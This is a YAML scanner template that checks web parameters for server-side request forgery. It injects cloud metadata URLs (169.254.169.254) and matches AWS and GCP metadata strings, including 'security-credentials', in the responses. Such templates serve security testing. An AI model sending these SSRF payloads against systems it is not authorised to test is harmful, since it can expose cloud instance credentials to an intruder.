37 lines
1.0 KiB
YAML
37 lines
1.0 KiB
YAML
id: xpl-ssrf-basic
|
|
info:
|
|
name: "Server-Side Request Forgery (basic reflection)"
|
|
author: imtaqin
|
|
severity: high
|
|
description: |
|
|
Checks for reflection of internal metadata endpoints in response
|
|
bodies via common SSRF-prone parameters.
|
|
NOTE: blind SSRF requires OOB (cloud tier).
|
|
tags:
|
|
- ssrf
|
|
|
|
# TODO(backend): swap http://169.254.169.254 for {{interactsh-url}} when
|
|
# the cloud OOB server is enabled; correlate DNS/HTTP callbacks.
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/"
|
|
- "{{BaseURL}}/proxy?u=http://169.254.169.254/latest/meta-data/"
|
|
- "{{BaseURL}}/image?src=http://169.254.169.254/"
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "ami-id"
|
|
- "instance-id"
|
|
- "security-credentials"
|
|
condition: or
|
|
name: aws-metadata-reflected
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "(?i)computeMetadata|project-id"
|
|
name: gcp-metadata-reflected
|